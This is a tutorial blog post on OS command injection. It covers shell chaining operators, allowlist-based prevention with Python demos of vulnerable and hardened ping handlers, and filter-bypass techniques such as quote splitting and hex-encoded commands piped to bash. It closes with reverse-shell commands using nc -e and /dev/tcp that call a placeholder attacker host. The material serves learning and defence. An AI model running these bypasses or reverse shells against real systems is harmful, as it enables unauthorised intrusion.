Remote code/command execution vulnerability learning (1)

Remote code/command execution vulnerabilities are commonly abbreviated RCE (remote command/code execution).

Remote Command Execution Vulnerability

1. Overview

OS command injection, usually just called command injection, is one of the injection vulnerability classes. Applications sometimes have a business reason to run operating-system commands, for example a ping check on a user-supplied address, and every such place is a candidate for a remote command execution vulnerability. The attacker appends extra commands of their own to the command the application already builds, that is, injects commands into the shell.

On Windows the command is run by cmd.exe (or PowerShell); on Linux it is run by a shell such as /bin/sh or bash.

2. Details

Cause analysis:

Some features of an application need the operating system's command facility to do their work. If the input that reaches such a command is not restricted during development, or only weakly restricted, an attacker who controls that input can inject commands into the operating system, and a vulnerability results.

Initial probing:

It is usually tested by entering specific command keywords or shell metacharacters and observing whether the response changes (extra output, an error, or a different status).


Remote command execution operators:

1. cmd1;cmd2

(Usable when command keywords and special symbols are not filtered.)

The semicolon separates two commands.

On Linux the second command runs after the first one has finished, regardless of its result. In Windows cmd.exe the semicolon is not a command separator (PowerShell does accept it).

So the response to a semicolon payload also tells you which operating system the target runs.

2. cmd1&cmd2

On Linux, & is the background operator: cmd1 is started in the background and cmd2 runs immediately, without waiting for cmd1 to finish or succeed. In Windows cmd.exe, & simply runs cmd1 and then cmd2, again regardless of whether cmd1 succeeded.

In other words, with & cmd1 can be anything at all; cmd2 will run, and cmd2 is the command the attacker actually wants.

3. cmd1||cmd2

|| is the OR operator: cmd1 runs first, and cmd2 runs only if cmd1 fails (exits with a non-zero status).

If cmd1 succeeds, cmd2 is not executed. This is why an attacker deliberately makes cmd1 fail, for example by giving ping an unresolvable host.

4. cmd1|cmd2

| is the pipe: the standard output of cmd1 becomes the standard input of cmd2. cmd2 runs whether or not cmd1 succeeds, and cmd2's output is what ends up in the response.

5. cmd1&&cmd2

&& is the AND operator: cmd1 runs first, and cmd2 runs only if cmd1 succeeds (exits with status zero).

The operators merely chain the attacker's command onto the application's own; the part that does the damage is the command itself.


Preventing remote command execution:

Filter key characters and keywords

Restrict what the user may enter and refuse to run input that contains shell metacharacters (; & | $ ` and the like) or dangerous keywords. An allowlist is far stronger than a blacklist: a ping feature only needs the characters that can appear in an IP address or hostname. Filtering alone remains fragile, as the bypasses below show; the robust fix is never to pass user input through a shell at all, and instead to hand the command its arguments as a fixed argument vector.
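The following Python script is an added illustration, not code from the original post. It puts a vulnerable ping handler beside a hardened one. `echo` stands in for the real `ping` binary so it runs anywhere without network access; the attacker inputs are constructed, one per chaining operator from the list above. The vulnerable version concatenates a string and runs it with `shell=True`; the hardened one allowlist-validates the host and passes an argument vector, so the shell never sees the input. Note that the `||` payload does not fire here because the stand-in `echo` succeeds, which is exactly the `||` semantics described above.

```python
import re
import subprocess

# Constructed attacker inputs for the "host" field of a ping feature,
# one per chaining operator.  Each appends a second command (echo INJECTED).
PAYLOADS = {
    ";":  "127.0.0.1; echo INJECTED",
    "&":  "127.0.0.1 & echo INJECTED",
    "||": "127.0.0.1 || echo INJECTED",   # runs cmd2 only if cmd1 fails
    "|":  "127.0.0.1 | echo INJECTED",
    "&&": "127.0.0.1 && echo INJECTED",   # runs cmd2 only if cmd1 succeeds
}

# "echo ping -c 1" stands in for a real ping so the demo needs no network;
# the string is handed to /bin/sh exactly as a vulnerable app would do.
PING_CMD = "echo ping -c 1 "


def ping_vulnerable(host):
    """String concatenation + shell=True: the classic command injection."""
    result = subprocess.run(PING_CMD + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def is_injected(host):
    """True if the attacker's appended command actually ran."""
    return "INJECTED" in ping_vulnerable(host)


# Allowlist: only characters that can appear in an IPv4 address or hostname.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def ping_safe(host):
    """Allowlist validation, then an argument vector with no shell.
    The host reaches execve as a single argv entry, so ; & | mean nothing."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("invalid host: %r" % host)
    result = subprocess.run(["echo", "ping", "-c", "1", host],
                            capture_output=True, text=True)
    return result.stdout


def safe_rejects(host):
    """True if the hardened handler refuses the input."""
    try:
        ping_safe(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for op, payload in PAYLOADS.items():
        print("%-2s vulnerable injected=%s  hardened rejects=%s"
              % (op, is_injected(payload), safe_rejects(payload)))
```

Run it on a Linux host with /bin/sh: the `;`, `&`, `|` and `&&` payloads all print INJECTED through the vulnerable handler, the `||` payload does not (the first command succeeded), and the hardened handler rejects every one of them before anything is executed.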


Bypassing filtering rules:

There are common workarounds when the input is filtered.

1. Add quotation marks

For example, whoami (which prints the name of the account the vulnerable service runs as, not necessarily an administrator) is a blocked keyword.

Entering who"am"i gets past the keyword check, because the shell removes the quotes before executing and still runs whoami.

2. Add the ^ symbol (Windows cmd.exe)

In cmd.exe, ^ is the escape character: it makes the following character literal and is itself removed, which breaks up the keyword without changing what runs.

For example, if echo is blocked, enter e^cho. cmd.exe still executes echo, but a filter that only compares the raw input against the four characters of echo sees five characters, e^cho != echo, and the check is bypassed.

3. Set a variable (Windows cmd.exe)

Enter set a=whoami (no spaces around the =), so that a holds whoami.

Then enter cmd /c %a%: the variable is expanded and whoami runs, returning the account name.

4. Use semicolons instead of spaces

A semicolon in place of a space only works in Windows cmd.exe, which treats ; like a space when splitting arguments. On Linux the semicolon separates two commands, so it cannot replace a space; there, keywords are usually broken up with single quotes or backslashes (wh'o'ami, wh\oami), and a space is typically replaced with ${IFS}.

5. Text to hexadecimal

The command can be sent as hexadecimal digits and decoded on the target just before execution, so the filter never sees the keyword.

For example, echo aaa becomes 6563686f20616161 in hex.

On the Linux command line, enter echo 6563686f20616161 | xxd -r -p | bash

xxd -r -p converts the hex back into the original command text, bash executes it, and the filter is bypassed.
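The following Python script is an added example, not code from the original post. It models the keyword blacklist the text describes and shows why each bypass above works: `shlex.split` applies the same quote and backslash removal a POSIX shell does, a small helper models cmd.exe's `^` escape (a simplification, not the real cmd.exe parser), and the hex round trip reproduces what `xxd -r -p` reconstructs on the target. The blocked keyword list and the sample payloads are constructed for the demo; an allowlist check is included to show that the same payloads do not get past it.

```python
import re
import shlex

# The kind of keyword blacklist the text describes: reject any input that
# contains one of these words.  Constructed for the demo.
BLOCKED_KEYWORDS = ("whoami", "cat", "nc")


def blacklist_allows(user_input):
    """Naive filter: substring match on the raw input, case-insensitive."""
    lowered = user_input.lower()
    return not any(word in lowered for word in BLOCKED_KEYWORDS)


def posix_shell_words(user_input):
    """What a POSIX shell runs after quote removal: shlex implements the
    same quoting rules, so who"am"i and wh\\oami both collapse to whoami."""
    return shlex.split(user_input)


def cmd_exe_words(user_input):
    """Simplified model of cmd.exe escaping (assumption, not the real parser):
    ^ makes the next character literal and is itself dropped, so e^cho is echo."""
    out, i = [], 0
    while i < len(user_input):
        if user_input[i] == "^" and i + 1 < len(user_input):
            out.append(user_input[i + 1])
            i += 2
        else:
            out.append(user_input[i])
            i += 1
    return "".join(out).split()


def hex_encode_command(cmd):
    """Turn a command into the hex digits an attacker would send."""
    return cmd.encode().hex()


def decode_hex_payload(hex_digits):
    """What `echo <hex> | xxd -r -p | bash` reconstructs on the target."""
    return bytes.fromhex(hex_digits).decode()


# Allowlist: the only characters a ping-style feature legitimately needs.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def allowlist_allows(user_input):
    """Positive validation: anything outside the allowed set is refused."""
    return bool(HOST_RE.fullmatch(user_input))


if __name__ == "__main__":
    hex_cmd = hex_encode_command("cat /etc/passwd")
    for payload in ('who"am"i', "wh\\oami", "e^cho aaa",
                    "echo %s | xxd -r -p | bash" % hex_cmd):
        print("%-55s blacklist=%s allowlist=%s" % (
            payload, blacklist_allows(payload), allowlist_allows(payload)))
```

Every obfuscated payload passes the blacklist while the shell still ends up running the blocked command; none of them passes the allowlist, which is the practical lesson of the prevention section.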


Once command execution is confirmed: getting a shell

1. Make the target connect back to a port on your own machine (a reverse shell)

On your own Linux machine, listen on a port in a terminal:

nc -lvnp 8081 (listen on port 8081)

At the point where command injection is possible, enter:

cmd1&nc -e /bin/bash ATTACKER_IP 8081

ATTACKER_IP is the address of your listening machine, not the target's: the target connects out to you.

You can then run commands on the target from the terminal on your own machine.

For example, entering whoami shows the account the vulnerable service runs as on the target.

Many nc builds, for example the one inside a typical Docker image (another Linux server), do not support -e. In that case use an interactive bash with its descriptors redirected to a TCP socket instead: bash -i >& /dev/tcp/ATTACKER_IP/8081 0>&1


Source: blog.csdn.net/love_wgll/article/details/129179893